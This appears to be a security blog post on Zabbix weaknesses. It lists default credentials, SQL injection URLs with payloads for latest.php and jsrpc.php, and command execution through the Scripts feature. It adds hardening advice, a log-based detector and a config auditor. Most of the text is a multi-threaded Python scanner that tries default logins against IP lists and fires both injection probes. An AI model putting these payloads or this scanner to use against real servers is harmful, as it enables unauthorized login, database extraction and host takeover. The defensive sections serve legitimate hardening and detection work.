I. Zabbix:

Zabbix is an enterprise-grade, open-source monitoring solution with a web-based interface that provides distributed system monitoring and network monitoring. It can monitor all kinds of network parameters to keep server systems running securely, and it provides a flexible notification mechanism so that administrators can quickly locate and resolve problems.

II. Zabbix vulnerabilities:

1. Weak passwords:

 WeakPassword = [("admin","zabbix"),("Admin","zabbix"),("guest","")]

2. SQL injection

(1)

Title: SQL injection in the toggle_ids[] parameter of latest.php

Attack conditions: requires login

Impact: can obtain system privileges

URL and payload (sid is the last 16 characters of the session id obtained after login):

 """
http://a.b.c.d/latest.php?output=ajax&sid=<last 16 characters of the post-login session id>&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385); select * from users where (1=1
"""

(2)

Title: SQL injection in the profileIdx2 parameter of jsrpc.php

Attack conditions: no login required; alternatively, after logging in, a higher-privilege sid and cookie can be substituted

Impact: the usual impact of SQL injection

URL and payload:

 """
http://a.b.c.d/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1
"""

(3)

Title: other SQL injection vulnerabilities: the itemid and periods parameters of chart_bar.php, and the applications parameter of httpmon.php

Attack conditions: unknown

Impact: unknown

URL and payload: try generic SQL injection payloads
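All three injection points above arrive as GET parameters on a handful of PHP files, so attempts against them are visible in the web server access log. The script below is an added example (not part of the original post): it parses combined-format access log lines, URL-decodes each query parameter the way PHP would, and flags requests to those scripts whose parameter values contain SQL function or keyword fragments. The log lines are constructed for this example, and the endpoint list and indicator list are this example's own assumptions rather than anything from the post.

```python
#!/usr/bin/env python3
"""Flag access-log requests to the injectable Zabbix PHP endpoints whose
parameters carry SQL fragments (added detection example, not the post's code)."""
import re
from urllib.parse import urlsplit, parse_qsl

# Endpoints the post lists as injectable (assumption: nothing else is watched).
WATCHED_SCRIPTS = {"latest.php", "jsrpc.php", "chart_bar.php", "httpmon.php"}
# Fragments that should never appear in a numeric id / profile parameter
# (indicator list is this example's assumption).
SQL_INDICATORS = ("updatexml(", "extractvalue(", "select ", "union ", "sleep(", "benchmark(")

# Apache/Nginx "combined" format: ip ident user [time] "METHOD target PROTO" ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*"'
)

# Constructed sample log: one jsrpc.php probe, one latest.php probe,
# one legitimate latest.php toggle, one unrelated page.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Aug/2016:05:06:32 +0000] "GET /jsrpc.php?type=9&method=screen.get&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.6 - - [17/Aug/2016:05:07:01 +0000] "GET /latest.php?output=ajax&sid=0bcd4ade648214dc&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385);%20select%20*%20from%20users%20where%20(1=1 HTTP/1.1" 200 88 "-" "Mozilla/5.0"
10.0.0.7 - - [17/Aug/2016:05:07:15 +0000] "GET /latest.php?output=ajax&sid=0bcd4ade648214dc&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385 HTTP/1.1" 200 88 "-" "Mozilla/5.0"
10.0.0.8 - - [17/Aug/2016:05:08:00 +0000] "GET /dashboard.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""


def inspect_request(ip, ts, target):
    """Return a finding dict for one request target, or None if it looks clean."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    if script not in WATCHED_SCRIPTS:
        return None
    # parse_qsl decodes %xx and '+' so the check sees the value as PHP would.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        lowered = value.lower()
        for indicator in SQL_INDICATORS:
            if indicator in lowered:
                return {"ip": ip, "time": ts, "script": script,
                        "param": name, "indicator": indicator}
    return None


def detect(log_text):
    """Scan a block of log lines and return the list of findings in log order."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        finding = inspect_request(m.group("ip"), m.group("ts"), m.group("target"))
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print("%(time)s %(ip)s -> %(script)s param %(param)s contains %(indicator)r" % f)
```

Decoding before matching matters: the latest.php probe is percent-encoded and the jsrpc.php one uses `+` for spaces, and neither would match a naive substring check on the raw line. Only requests to the four endpoints are inspected, which keeps false positives from search boxes and free-text fields elsewhere in the frontend to a minimum.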

3. OS command injection / execution:

(1) After logging in with a weak password, Zabbix's built-in Script feature can be used to execute system commands, spawn a reverse shell, and so on.

(2) Defenses:

  # Do not set AllowRoot=1, so that the agent and server do not start as root.

  # Prevent the agent from executing system.run: do not set EnableRemoteCommands=1.

  # Apply patches promptly.
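The two agent settings above can be checked mechanically rather than by eye. The script below is an added example (not from the original post): it parses the `Key=Value` format used by zabbix_agentd.conf, treats an absent key as the default value 0 (an assumption of this example), and reports every setting that contradicts the guidance. The two configuration fragments are constructed for the example.

```python
#!/usr/bin/env python3
"""Audit a Zabbix agent config for the risky settings named in the defenses
(added example, not the post's script)."""
import re

# Setting -> value the guidance above says to avoid.
RISKY_SETTINGS = {
    "AllowRoot": "1",             # agent/server would run as root
    "EnableRemoteCommands": "1",  # agent would execute system.run from the server
}

# Constructed sample: an agent config that ignores both recommendations.
RISKY_CONF = """\
# Zabbix agent configuration (constructed for this example)
PidFile=/var/run/zabbix/zabbix_agentd.pid
Server=192.0.2.10
AllowRoot=1
EnableRemoteCommands=1
"""

# Constructed sample: AllowRoot explicitly off, EnableRemoteCommands left unset.
HARDENED_CONF = """\
Server=192.0.2.10
AllowRoot=0
# EnableRemoteCommands is not set, so the default of 0 applies
"""

KEYVALUE_RE = re.compile(r"^([A-Za-z][A-Za-z0-9]*)\s*=\s*(.*)$")


def parse_agent_conf(text):
    """Parse Zabbix's Key=Value config; '#' lines are comments; last value wins."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = KEYVALUE_RE.match(line)
        if not m:
            continue  # malformed line; the agent would reject it anyway
        settings[m.group(1)] = m.group(2).strip()
    return settings


def audit(settings):
    """Return 'Key=Value' strings for every setting at its risky value."""
    findings = []
    for key, risky_value in RISKY_SETTINGS.items():
        # Assumption: a missing key means the documented default of 0.
        value = settings.get(key, "0")
        if value == risky_value:
            findings.append("%s=%s" % (key, value))
    return findings


def audit_agent_conf(text):
    """Convenience wrapper: parse then audit one config file's text."""
    return audit(parse_agent_conf(text))


if __name__ == "__main__":
    for label, conf in (("risky", RISKY_CONF), ("hardened", HARDENED_CONF)):
        findings = audit_agent_conf(conf)
        print("%s config: %s" % (label, ", ".join(findings) if findings else "no risky settings"))
```

Run it against a real file with `audit_agent_conf(open("/etc/zabbix/zabbix_agentd.conf").read())`; a non-empty result means the agent still accepts remote commands or runs as root, which is exactly the combination that turns a weak frontend password into command execution on the host.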

4. A Python check script I wrote myself; if you find problems, call them out:

#!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
This Python Script Is For "Zabbix" VulnScan!
Author:ChenRan
Company:360.net
"""
# import lib files
import os
import sys
import time
import logging
import datetime
import requests
import threading
from bs4 import BeautifulSoup
from optparse import OptionParser

# global variable defines
ZabbixTarget = None  # target ip address!
ZabbixFile = None    # target ip address file
# strings that mean the login page came back, i.e. the login attempt failed
BlackList = [
    'incorrect',
    '<!-- Login Form -->'
]

# global config set
logging.basicConfig(level=logging.INFO, format='%(message)s')
USER_AGENT = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'


# global function defines:
def Config_Init():
    """
    Prepend "http://" to the ip address(es) to create the target url list!
    """
    global ZabbixTarget
    global ZabbixFile
    if ZabbixTarget:
        target = "http://%s" % ZabbixTarget
        return [target]
    elif ZabbixFile:
        targetlist = []
        with open(ZabbixFile, "r") as fr:
            for ip in fr.readlines():
                ip = ip.strip()  # drop \r\n and surrounding whitespace
                if not ip:
                    continue
                target = "http://%s" % str(ip)
                targetlist.append(target)
        return targetlist
    else:
        return []


def get_post_data(page_content):
    """
    from response html get post data (all named <input> values)!
    """
    postdata = {}
    soup = BeautifulSoup(page_content, "html.parser")
    for inputparameter in soup.find_all('input'):
        if 'value' in inputparameter.attrs and 'name' in inputparameter.attrs:
            postdata[inputparameter['name']] = inputparameter['value']
    return postdata


def report_file_allinone():
    """Merge the per-thread result files into one csv report and delete them."""
    vulnlist = []
    for parents, dirs, filenames in os.walk("./"):
        for filename in filenames:
            if filename.find("zabbix_vulnscan_result") >= 0:
                filepath = os.path.join(parents, filename)
                with open(filepath, "r") as fr:
                    vulnlist.extend(fr.readlines())
                os.remove(filepath)
    with open("zabbix_vuln_report_%s.csv" % str(datetime.date.today()), "w") as fw:
        fw.write("vuln-IP,Vuln-Type,Scan-Time\n")
        for line in vulnlist:
            fw.write(line)


# Zabbix Scan Class Defines
class ZabbixScan:
    def __init__(self, targetlist):
        """
        #class column init!
        VulnExpPHPFile:
        //0-login-weakpassword
        //1-httpmon.php parameter->applications
        //2-chart_bar.php parameter->itemid
        //3-jsrpc.php parameter->profileIdx2
        //4-latest.php parameter->toggle_ids[]
        //5-OS_Injection->When you login the system you can run your scripts!
        TestTarget:
        //0-login-weakpassword
        //1-jsrpc.php
        //2-latest.php
        """
        # default password dictionary!
        self._weakpassword = [{"username": "Admin", "password": "zabbix"},
                              {"username": "admin", "password": "zabbix"},
                              {"username": "guest", "password": ""}]
        self._targetlist = targetlist  # targets waiting for scan!
        self._size = len(self._targetlist)  # size of scan target!
        self._sqlinjectionurl1_vulnlist = []  # (target, user, pswd) tuples
        self._sqlinjectionurl2_vulnlist = []  # target urls
        self._login_weakpassword_vulnlist = []  # (target, user, pswd) tuples
        self._login_weakpassword_safelist = []

    def __del__(self):
        del self._weakpassword
        del self._targetlist
        del self._size
        del self._sqlinjectionurl1_vulnlist
        del self._sqlinjectionurl2_vulnlist
        del self._login_weakpassword_vulnlist
        del self._login_weakpassword_safelist

    def __len__(self):
        """return size of targetlist"""
        return self._size

    def _scan_default_password_login(self):
        for authinfo in self._weakpassword:
            user = authinfo["username"]
            pswd = authinfo["password"]
            for target in self._targetlist:
                logging.info("[*] Target:%s Payload:%s" % (str(target), str(authinfo)))
                headers = {'User-Agent': USER_AGENT}
                request = requests.session()
                try:
                    response = request.get(target, headers=headers, timeout=3)
                except Exception as ex:
                    self._login_weakpassword_safelist.append(target)
                    continue
                if response.status_code != 200:
                    self._login_weakpassword_safelist.append(target)
                    continue
                postdata = get_post_data(response.text)
                headers["Referer"] = target
                postdata["user"] = user
                postdata["password"] = pswd
                try:
                    response = request.post(target + "/index.php", headers=headers, data=postdata, timeout=3)
                except Exception as ex:
                    self._login_weakpassword_safelist.append(target)
                    continue
                if "chkbxRange.init();" in response.text:
                    # a logged-in page that still shows a login-failure marker is not a hit
                    for flagstring in BlackList:
                        if flagstring in response.text:
                            self._login_weakpassword_safelist.append(target)
                            break
                    else:
                        self._login_weakpassword_vulnlist.append((target, user, pswd))
                else:
                    self._login_weakpassword_safelist.append(target)
                request.close()

    def _sqlinjectionurl1_scan(self):
        logging.info("[*] latest.php sqlinjection scan!")
        for vulntarget in self._login_weakpassword_vulnlist:
            target, user, pswd = vulntarget
            request = requests.session()
            headers = {'User-Agent': USER_AGENT}
            try:
                response = request.get(target, headers=headers, timeout=3)
            except Exception as ex:
                continue
            postdata = get_post_data(response.text)
            postdata["user"] = user
            postdata["password"] = pswd
            headers["Referer"] = target
            try:
                response = request.post(target + "/index.php", headers=headers, data=postdata, timeout=3)
            except Exception as ex:
                continue
            # sid is the last 16 characters of the session cookie set at login
            cookievalues = list(request.cookies.values())
            if not cookievalues:
                request.close()
                continue
            sessionid = cookievalues[0][-16:]
            # malformed value; a vulnerable page answers with a database error
            probe = "1%^&*%22%27()-*#"
            scanurl = (target + "/latest.php?output=ajax&sid=" + str(sessionid)
                       + "&favobj=toggle&toggle_open_state=1&toggle_ids[]=" + probe)
            try:
                response = request.get(scanurl, headers=headers, timeout=20)
            except Exception as ex:
                continue
            if "SQL syntax" in response.text:
                self._sqlinjectionurl1_vulnlist.append(vulntarget)
            request.close()

    def _sqlinjectionurl2_scan(self):
        logging.info("[*] jsrpc.php sqlinjection scan!")
        for vulntarget in self._targetlist:
            scanurl = vulntarget + "/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17"
            headers = {'User-Agent': USER_AGENT}
            try:
                response = requests.get(scanurl, headers=headers, timeout=20)
            except Exception as ex:
                continue
            # the md5 echoed back in the error message marks a vulnerable target
            if "ed733b8d10be255eceba344d533586" in response.text:
                self._sqlinjectionurl2_vulnlist.append(vulntarget)

    def scan_run(self):
        self._scan_default_password_login()
        self._sqlinjectionurl1_scan()
        self._sqlinjectionurl2_scan()


class scanthread(threading.Thread):
    def __init__(self, threadname, targetlist):
        threading.Thread.__init__(self, name=threadname)
        self.scanner = ZabbixScan(targetlist)
        self.name = threadname
        self.targetlist = targetlist

    def _create_csv(self):
        """Write this thread's findings to its own result file."""
        scantime = str(datetime.datetime.now())
        with open("zabbix_vulnscan_result_%s_%s" % (str(time.time()), str(self.name)), "w") as fw:
            for vuln in self.scanner._login_weakpassword_vulnlist:
                target = vuln[0].split("http://")[-1]
                vulntype = "weakpassword"
                fw.write("%s,%s,%s\n" % (str(target), vulntype, scantime))
            for vuln in self.scanner._sqlinjectionurl1_vulnlist:
                target = vuln[0].split("http://")[-1]
                vulntype = "latest.php-SQLI"
                fw.write("%s,%s,%s\n" % (str(target), vulntype, scantime))
            for vuln in self.scanner._sqlinjectionurl2_vulnlist:
                # this list holds plain target urls, not tuples
                target = vuln.split("http://")[-1]
                vulntype = "jsrpc.php-SQLI"
                fw.write("%s,%s,%s\n" % (str(target), vulntype, scantime))

    def run(self):
        # logging.info("[*] %s running!" % self.name)
        # logging.info("[*] %s MyTarget:%s" % (str(self.name), str(self.targetlist)))
        self.scanner.scan_run()
        self._create_csv()
        # logging.info("[*] %s finished!" % self.name)


if __name__ == "__main__":
    logging.info("[+]*****************************************************************[+]")
    logging.info("Zabbix Scan Init!")
    parser = OptionParser()
    parser.add_option("-i", "--iptarget", dest="iptarget", help="Target IP address!")
    parser.add_option("-f", "--iptargetfile", dest="iptargetfile", help="Target IPs file!")
    parser.add_option("-t", "--threadnum", dest="threadnum", help="Number of Added Threads to Scan!")
    (options, args) = parser.parse_args()
    parameterchecklist = [options.iptarget, options.iptargetfile]
    if parameterchecklist in [[None, None], [None, ""], ["", None], ["", ""]]:
        logging.error("[-] Target parameters error!")
        sys.exit(0)
    try:
        options.threadnum = 1 if options.threadnum in (None, "") else max(1, int(options.threadnum))
    except Exception as ex:
        logging.error("[-] Threadnum parameter error!")
        sys.exit(0)
    [ZabbixTarget, ZabbixFile] = parameterchecklist
    logging.info("[+] Scan Config Init!")
    targetlist = Config_Init()
    targetsize = len(targetlist)
    logging.info("[+] Scan Target Number:%s" % str(targetsize))
    logging.info("[+] Scan Threads Init")
    # integer division; at least one target per thread, otherwise the split loop never ends
    threadtargetsize = max(1, targetsize // options.threadnum)
    dividestart = 0
    divideend = threadtargetsize
    threadlist = []
    nameflag = 0
    while True:
        threadname = "scan-thread-%s" % str(nameflag)
        nameflag += 1
        if divideend < targetsize:
            threadtargetlist = targetlist[dividestart:divideend]
            threadlist.append(scanthread(threadname, threadtargetlist))
            dividestart += threadtargetsize
            divideend += threadtargetsize
        elif dividestart < targetsize:
            # the last thread takes the remainder
            threadtargetlist = targetlist[dividestart:]
            threadlist.append(scanthread(threadname, threadtargetlist))
            dividestart += threadtargetsize
            divideend += threadtargetsize
        else:
            break
    logging.info("[+] Scan Thread Start!")
    for thread in threadlist:
        thread.start()
        time.sleep(2)
        logging.info("[+] %s --Start!" % thread.name)
    for thread in threadlist:
        thread.join()
    logging.info("[+] Scan Finished!")
    logging.info("[+] Report Creating!")
    report_file_allinone()
    logging.info("[+] Report Create!")
    sys.exit(0)
